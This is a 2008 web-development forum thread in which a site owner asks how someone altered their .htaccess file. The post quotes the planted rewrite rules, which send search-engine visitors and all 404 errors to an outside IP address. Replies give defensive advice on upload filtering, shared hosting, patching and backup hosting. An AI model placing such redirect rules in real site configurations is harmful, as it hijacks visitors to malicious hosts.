Page 1 of 1
.htaccess Edited... but not by me!
Posted: Sat Jul 26, 2008 6:48 pm
by Chalks
Ok guys, I'd love to hear thoughts on this one. I had a very strange thing happen to me today. I found out that my .htaccess file had been edited by _someone_ to have this in it:
Code: Select all
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.88/in.html?s=hg [R,L]
Errordocument 404 http://87.248.180.88/in.html?s=hg_err
I'm not entirely sure what all of that means. However, I now know that all my 404s were getting redirected to 87.248.180.88 (which seems to be spam/virus-ey). I discovered this by almost pure chance. I've alerted my hosting provider, have changed all my passwords, and removed all the code that I could find. However, I'm _very_ curious as to how this got into my .htaccess file.
I would be _very_ surprised if someone had guessed my password since it's rather strong (8+ characters, capitalization thrown in and numbers/special chars).
I'm pretty sure that none of the php scripts on my server have access to this file, but I could be wrong (?).
Any ideas?
Re: .htaccess Edited... but not by me!
Posted: Sat Jul 26, 2008 9:11 pm
by psychotomus
if any of your forms allow uploading. need to check that they can only upload certain file types. I forgot to do this on one of my sites and that uploaded a .js file and ereased over 200gb of data from my server. it took about 2 weeks to reupload it all.
Re: .htaccess Edited... but not by me!
Posted: Sat Jul 26, 2008 9:43 pm
by Chris Corbyn
Are you on a shared host? It's possible that all users run PHP under the same userid which is a big security risk.
Re: .htaccess Edited... but not by me!
Posted: Sun Jul 27, 2008 9:22 am
by volomike
Check to see if something you did in your shared hosting control panel (if you used shared hosting) did this to you. If not, then you need to go to your web hosting provider to ask if they have an answer. If they don't have an answer, then yeah, you might have been hacked. They don't need to know your password -- there are exploits in certain packages and certain versions of Apache 1.5 and 2. You have to ensure your stuff is patched and up to date. Usually that's the job of your web hosting provider. So, for instance, if I were hacked on a shared host, I'd ensure I had good backups, find the one that worked, complain to my web hosting provider to keep the systems secure, and once everything was good again, I'd reupload my stuff from backup.
If it's mission critical, some people go this route. They use a separate DNS system like moniker.com to purchase their domains and host the DNS record for them. Then, they point them to a web hosting provider. They then get a completely separate but compatible web hosting provider that can also rehost their stuff and leave that out there for the time being. In the event of something like this, they just go to moniker.com and repoint their domain to the backup web host in order to have their stuff come back online quickly. In the meantime, the site owner (you) would then split up all the sites s/he owns across these two web hosts. When one starts to have trouble, they can move some or all the domains to the other.
Re: .htaccess Edited... but not by me!
Posted: Sat Oct 25, 2008 7:21 am
by VladSun
volomike wrote:They use a separate DNS system like moniker.com to purchase their domains and host the DNS record for them. Then, they point them to a web hosting provider. They then get a completely separate but compatible web hosting provider that can also rehost their stuff and leave that out there for the time being. In the event of something like this, they just go to moniker.com and repoint their domain to the backup web host in order to have their stuff come back online quickly.
It's true only if the TTL for DNS records is set to a very low value (e.g. 1hour), which is really rarely seen in DNS registrators.
The TTL is usually set to 86400 - 1 day.
Also, most of the sites use a DB server - it should be synchronized with the "new" one.
Re: .htaccess Edited... but not by me!
Posted: Mon Oct 27, 2008 9:21 am
by panic!
manialix wrote:Yes 100% agreed with Chris Corbyn Its big Security Risk.
I like how you signed up just to agree with someone haha.
